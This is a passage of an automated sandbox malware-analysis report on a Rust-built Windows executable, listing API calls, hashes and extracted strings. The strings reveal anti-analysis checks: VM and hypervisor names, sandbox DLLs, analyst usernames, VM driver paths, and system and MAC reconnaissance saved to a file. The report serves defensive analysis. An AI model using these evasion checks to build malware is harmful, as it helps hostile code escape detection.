                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: EnvironmentStrings$CloseFreeHandle
                                            • String ID: #$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "batch file arguments are invalid$.exeprogram not found$PATHlibrary\std\src\sys_common\process.rs$\?\\$]?\\$assertion failed: is_code_point_boundary(self, new_len)$assertion failed: self.height > 0$exe\\.\NUL\cmd.exemaximum number of ProcThreadAttributes exceeded
                                            • API String ID: 1070102993-4160752474
                                            • Opcode ID: e0e4134bb13c93bb1cb2ae8ca2a83206a7417c017054b62f519f36f622cae1c7
                                            • Instruction ID: 4612318126273ee75c259bf035c9f153c0198a248e307befcd49039fbc82166e
                                            • Opcode Fuzzy Hash: e0e4134bb13c93bb1cb2ae8ca2a83206a7417c017054b62f519f36f622cae1c7
                                            • Instruction Fuzzy Hash: 0F73A462A18AD389EB709F29DD503F96371FB2A789F804135DB6D4BB99DF38D2418310
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: /ficsproductidentifyingnumber$12345678$1RLV$COMPUTERNAMEComputer Name: $F0CF008J$L1HF0CF0$USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel$a Display implementation returned an error unexpectedly/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\alloc\src\string.rs$ed.$getmacMAC Address: $nown$ormation$sbiedll.dlldbghelp.dllapi_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dll/mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul userworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARA$system_info.txtFailed to write to file: $systeminfoSystem Info: $tected.$wmicC:\windows\sysnative\drivers\vmmouse.sysC:\windows\sysnative\drivers\vmhgfs.sysC:\windows\sysnative\drivers\vmusbmouse.sysvmtoolsd.exevboxservice.exevboxtray.exeIMAGENAME eq $x DLLs:
                                            • API String ID: 0-225615594
                                            • Opcode ID: c42897ccc4d9aed1fb04b667ccb191a2c2fb66f9d5a861493744c592ca57521d
                                            • Instruction ID: 8aa1ac83b3ff1e56278832421f402ede3ba0b33dec2634d2f31141924ad0d9e7
                                            • Opcode Fuzzy Hash: c42897ccc4d9aed1fb04b667ccb191a2c2fb66f9d5a861493744c592ca57521d
                                            • Instruction Fuzzy Hash: 51733472605BD289EB719F28D8803E963B5FB56B88F804125DB5C4BB99EF39D384C310

                                            Control-flow Graph

                                            • Control-flow graph (image not extracted): function at 7ff7b902fdf0; API calls in graph: GetCurrentProcessId, ProcessPrng, CreateNamedPipeW, GetLastError, CloseHandle
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: Process$CurrentPrng
                                            • String ID:
                                            • API String ID: 716580790-0
                                            • Opcode ID: c8928d5f51c56d2f59684b6c8d261d04b54f34b2b64c57bd3e0c046a5bc1a12a
                                            • Instruction ID: 7208bfd52bc82c723d3bbbc37436f0814e5a0927f2993ea0398129308e7768e3
                                            • Opcode Fuzzy Hash: c8928d5f51c56d2f59684b6c8d261d04b54f34b2b64c57bd3e0c046a5bc1a12a
                                            • Instruction Fuzzy Hash: 5F22E462A09A8289E7649F29D9003FA7AB4FB1A798F404235DF6E47798DF7DD144C310

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: CloseFind$FileFirstHandle
                                            • String ID:
                                            • API String ID: 1310327803-0
                                            • Opcode ID: 108ad1669d5f654cf7088fbd5db76f8917ec5f9a1101b15b5fb6b39ab74f4e40
                                            • Instruction ID: cdfffae1c08a1d30c16b4960e8c21b7e23b45977aa25b424639e4b407d5f90f0
                                            • Opcode Fuzzy Hash: 108ad1669d5f654cf7088fbd5db76f8917ec5f9a1101b15b5fb6b39ab74f4e40
                                            • Instruction Fuzzy Hash: E7518032A04B8286E7309F65E8843EAB771FB66798F504235CF6D1AB99DF3CE5418350

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorFileObjectSingleStatusWaitWrite
                                            • String ID:
                                            • API String ID: 3447438843-0
                                            • Opcode ID: 83d7b160387bc71befc0e2236d4a3df64de8f29feef33d0b9e5494b388aa95c9
                                            • Instruction ID: 12264b5238a504de655ab048e8148ecf2e09e520d9edc9f28c9dd45cccc67eb2
                                            • Opcode Fuzzy Hash: 83d7b160387bc71befc0e2236d4a3df64de8f29feef33d0b9e5494b388aa95c9
                                            • Instruction Fuzzy Hash: D131AF32B04B429AE710DF78E8907ED73B0EB66398F904130EB5D43A98EF38D5948750

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorFileObjectReadSingleStatusWait
                                            • String ID:
                                            • API String ID: 3583596364-0
                                            • Opcode ID: 6b2b8c81433aba9b8012bb8a5dc3d03e10c04479521bde7f886105c347d82123
                                            • Instruction ID: 272e8d1bd351b0e37f8b198d9c19126491cc535954e1642e1ccab9a5172f8075
                                            • Opcode Fuzzy Hash: 6b2b8c81433aba9b8012bb8a5dc3d03e10c04479521bde7f886105c347d82123
                                            • Instruction Fuzzy Hash: 02318172B04B5299F710DF78E8407E973B5AB66398F904130EB5D82A98EF3CD5948750

                                            Control-flow Graph

                                            • Control-flow graph (image not extracted): function at 7ff7b901cbf0; API calls in graph: BCryptGenRandom, SystemFunction036
                                            APIs
                                            • BCryptGenRandom.BCRYPT(?,?,?,00007FF7B901C955,?,?,?,00007FF7B904D87B), ref: 00007FF7B901CC42
                                            • SystemFunction036.ADVAPI32(?,?,?,00007FF7B901C955,?,?,?,00007FF7B904D87B), ref: 00007FF7B901CC53
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: CryptFunction036RandomSystem
                                            • String ID:
                                            • API String ID: 1232939966-0
                                            • Opcode ID: 156b8d29b021a0b699b54c0dc488f79796eb3c5d946079082ee26368548ee791
                                            • Instruction ID: 97aa3559aff75915d0179959bc38f0e2853e6deb6df882a49d295fdcb9809219
                                            • Opcode Fuzzy Hash: 156b8d29b021a0b699b54c0dc488f79796eb3c5d946079082ee26368548ee791
                                            • Instruction Fuzzy Hash: 22F0F422F0917691F9607E6B2E44534D1622F26BF0DA84731FE3C877E8BC28DC824210

                                            Control-flow Graph

                                            • Control-flow graph (image not extracted): function at 7ff7b901da70; API calls in graph: GetTimeZoneInformationForYear
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: InformationTimeYearZone
                                            • String ID:
                                            • API String ID: 2325421820-0
                                            • Opcode ID: 00a454c135f09f1f250e6a997138a96e1f69e719d8c17f8820de649a108718ef
                                            • Instruction ID: 83e565ca548d10dfd16f5793054f28230c7735f4d00d02c9d5d01cd91b9a33b3
                                            • Opcode Fuzzy Hash: 00a454c135f09f1f250e6a997138a96e1f69e719d8c17f8820de649a108718ef
                                            • Instruction Fuzzy Hash: 56313232608692C6E725DF19E0847AAF7B1E7D9354F404035EB9A47B59EB7CE085CF10
                                            Strings
                                            • /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel, xrefs: 00007FF7B9018B4D, 00007FF7B9018E1A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
                                            • API String ID: 0-984818510
                                            • Opcode ID: 97c764e578281867c64b0fca19dff450a4063e0231973d55c4d4325fceece58d
                                            • Instruction ID: 4e6b2bd2af0c165d64281b9f6d9f93a0c657b0904c3c9cc4157bea2cc206f87d
                                            • Opcode Fuzzy Hash: 97c764e578281867c64b0fca19dff450a4063e0231973d55c4d4325fceece58d
                                            • Instruction Fuzzy Hash: 9D918022A08B62C5E710AF29D8403ACB7B0FB5AB98F554535EF6C17789DF38D281C360

                                            Control-flow Graph

                                            • Control-flow graph (image not extracted): function at 7ff7b902a610; API calls in graph: CloseHandle, WaitForSingleObject, GetLastError, GetExitCodeProcess
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait
                                            • String ID: called `Result::unwrap()` on an `Err` value
                                            • API String ID: 17306042-2333694755
                                            • Opcode ID: 98050de64407eec83e84d274591eb1f76851ba59d11f64f5e6645ddd7a7c7f19
                                            • Instruction ID: 2db730b11b43736a6d2a8f1d0437612f05866c3b10069a8452be78bad8b6f4a2
                                            • Opcode Fuzzy Hash: 98050de64407eec83e84d274591eb1f76851ba59d11f64f5e6645ddd7a7c7f19
                                            • Instruction Fuzzy Hash: CFA14E32A04B8299E7609F39E8403E973B0FB5A798F958125EF6D07B99DF38D185C350

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                            • String ID:
                                            • API String ID: 1804101941-0
                                            • Opcode ID: eee810bb95535470bffe68d2ba9a8a383abc4ee3ff95bb7e2462f86346f6db18
                                            • Instruction ID: dea37d29d0542fcfe3efdfdc4c4cd612591d9041f078524b778c40b7303f0144
                                            • Opcode Fuzzy Hash: eee810bb95535470bffe68d2ba9a8a383abc4ee3ff95bb7e2462f86346f6db18
                                            • Instruction Fuzzy Hash: BF311B21A0D14382EA54BF2D94553B9A3B1AFA7784FC44835EB6D473EFDE2CE8448620

                                            Control-flow Graph

                                            • Control-flow graph (image not extracted): function at 7ff7b902e610; API calls in graph: CreateFileW, GetLastError, CloseHandle, SetFileInformationByHandle
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorLast$FileHandle$CloseCreateInformation
                                            • String ID:
                                            • API String ID: 1617036312-0
                                            • Opcode ID: 0ddb327ce91df9d84e5046fd063802ff5ba92c5831474f6817db1fb96f3d3a89
                                            • Instruction ID: 6ef4f285d6c8a37570db7eda84510f3e2a750906e17bb684523ce09a945198cb
                                            • Opcode Fuzzy Hash: 0ddb327ce91df9d84e5046fd063802ff5ba92c5831474f6817db1fb96f3d3a89
                                            • Instruction Fuzzy Hash: B371B351E4825346FB656E2994083F9BAB1AF36B98F944131CF6D17BCDDE3CD8858320

                                            Control-flow Graph

                                            • Control-flow graph (image not extracted): function at 7ff7b9024ca0; API calls in graph: CreateWaitableTimerExW, SetWaitableTimer, WaitForSingleObject, CloseHandle, Sleep
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: CloseHandleTimerWaitable$CreateObjectSingleSleepWait
                                            • String ID:
                                            • API String ID: 2261246915-0
                                            • Opcode ID: abd99af6bd88042d1dd5512cba818c5c5812610d3b38a9f3d41f1412972b137f
                                            • Instruction ID: 376d799660e9aaf7a87c172b1218cfc2cc6b4155b41863ca5cbe5cb876da8aee
                                            • Opcode Fuzzy Hash: abd99af6bd88042d1dd5512cba818c5c5812610d3b38a9f3d41f1412972b137f
                                            • Instruction Fuzzy Hash: BB21D622F0571302FB58AF396915778B2769FA77A4F848234DE3E42BE8DE3CE4414620

                                            Control-flow Graph

                                            • Control-flow graph (image not extracted): function at 7ff7b90246c0; API calls in graph: AddVectoredExceptionHandler, SetThreadStackGuarantee, GetCurrentThread, SetThreadDescription
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: Thread$CurrentDescriptionExceptionGuaranteeHandlerStackVectored
                                            • String ID: main
                                            • API String ID: 3663057573-3207122276

                                            Similarity
                                            • API ID: ComputerName$ErrorLast
                                            • String ID:
                                            • API String ID: 2051095488-0
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B90340C9), ref: 00007FF7B9036AC8
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            Similarity
                                            • API ID: Process$CloseCurrentHandlePrng
                                            • String ID:
                                            • API String ID: 842889843-0
                                            Similarity
                                            • API ID: AddressProc$CurrentProcess$Mutex$CloseCreateHandleLibraryLoadObjectReleaseSingleWaitlstrlen
                                            • String ID: EnumerateLoadedModulesW64$SymGetOptions$SymGetSearchPathW$SymInitializeW$SymSetOptions$SymSetSearchPathW$assertion failed: len >= 0$dbghelp.dll
                                            • API String ID: 422451348-310313858
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            Strings
                                            • assertion failed: self.is_char_boundary(new_len)/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\alloc\src\string.rs, xrefs: 00007FF7B902F66C
                                            • NTDLL.DLL, xrefs: 00007FF7B902F385
                                            Similarity
                                            • API ID: ErrorFormatHandleLastMessageModule
                                            • String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\alloc\src\string.rs
                                            • API String ID: 1273946083-2010291737
                                            Similarity
                                            • API ID: AttributeInitializeListProcThread
                                            • String ID:
                                            • API String ID: 1263136677-0
                                            Similarity
                                            • API ID:
                                            • String ID: .llvm./rust/deps\rustc-demangle-0.1.24\src/lib.rs$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`
                                            • API String ID: 0-1033176386
                                            Similarity
                                            • API ID:
                                            • String ID: Authenti$GenuineI$HygonGen
                                            • API String ID: 0-696657513
                                            Similarity
                                            • API ID:
                                            • String ID: punycode{-}0
                                            • API String ID: 0-2450133883
                                            Similarity
                                            • API ID:
                                            • String ID: 00000000
                                            • API String ID: 0-3221785859
                                            APIs
                                            • GetSystemTimePreciseAsFileTime.KERNEL32(?,?,?,?,?,00007FF7B901D6E0,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7B902AB26
                                            Similarity
                                            • API ID: Time$FilePreciseSystem
                                            • String ID:
                                            • API String ID: 1802150274-0
                                            Similarity
                                            • API ID:
                                            • String ID: 0123456789abcdef
                                            • API String ID: 0-1757737011
                                            Similarity
                                            • API ID:
                                            • String ID: 0123456789abcdefBorrowMutErroralready borrowed:
                                            • API String ID: 0-1320686809
                                            Strings
                                            • USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel, xrefs: 00007FF7B903866E
                                             Similarity
                                             • String ID: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
                                            Strings
                                            • USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel, xrefs: 00007FF7B90242EB
                                             Similarity
                                             • String ID: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
                                            Strings
                                            • USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel, xrefs: 00007FF7B9011018
                                             Similarity
                                             • String ID: USERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
                                             Similarity
                                             • API ID: HeapProcess
                                             Similarity
                                             • API ID: ErrorHandleLast
                                             Similarity
                                             • API ID: BlockFrameHandler3::Unwindterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStateabortstd::bad_alloc::bad_alloc
                                             • String ID: csm$csm$csm
                                            APIs
                                            • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000001,00000000,?,00007FF7B903AEE3), ref: 00007FF7B903B098
                                            • GetProcAddress.KERNEL32(?,?,?,?,00000001,00000000,?,00007FF7B903AEE3), ref: 00007FF7B903B0D0
                                            • GetProcAddress.KERNEL32(?,?,?,?,00000001,00000000,?,00007FF7B903AEE3), ref: 00007FF7B903B10A
                                            • GetProcAddress.KERNEL32(?,?,?,?,00000001,00000000,?,00007FF7B903AEE3), ref: 00007FF7B903B170
                                            • GetProcAddress.KERNEL32(?,?,?,?,00000001,00000000,?,00007FF7B903AEE3), ref: 00007FF7B903B1A3
                                             Similarity
                                             • API ID: AddressProc$CurrentProcess
                                             • String ID: SymAddrIncludeInlineTrace$SymFromInlineContextW$SymGetLineFromInlineContextW$SymQueryInlineTrace
                                             Similarity
                                             • API ID: ErrorLast$FullNamePath
                                             • String ID: \\?\$\\?\UNC\
                                             Similarity
                                             • API ID: Handle$CloseErrorLast$CreateCurrentDuplicateProcessThread
                                             • String ID: RUST_MIN_STACK$failed to spawn thread
                                            APIs
                                            Strings
                                            • stack backtrace:, xrefs: 00007FF7B902AC49
                                            • note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...], xrefs: 00007FF7B902AF85
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorLast$CaptureContextCurrentDirectoryEntryFunctionLookup
                                            • String ID: note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]$stack backtrace:
                                            • API String ID: 2800785878-3192684347
                                            • Opcode ID: 92a787d140059c6739102b84400e6c34c6f864ac35a1194e2f8a9f4b27341794
                                            • Instruction ID: cc12666b93f7250940979922533f38d42e843b6c42fa28edba59bb9130ae6c3d
                                            • Opcode Fuzzy Hash: 92a787d140059c6739102b84400e6c34c6f864ac35a1194e2f8a9f4b27341794
                                            • Instruction Fuzzy Hash: A6B10862604FC198EB719F28DC403EA77A4FB16799F840129DB5C4BB99EF38D245DB10
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                             • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: CloseCreateErrorEventHandleLastMultipleObjectsOverlappedResultWait
                                            • String ID:
                                            • API String ID: 1266231692-0
                                            • Opcode ID: b84400ee7e79c55e95b58c046b33fc67579e9979e9ec7a4a9ffbca3d45e0d5bb
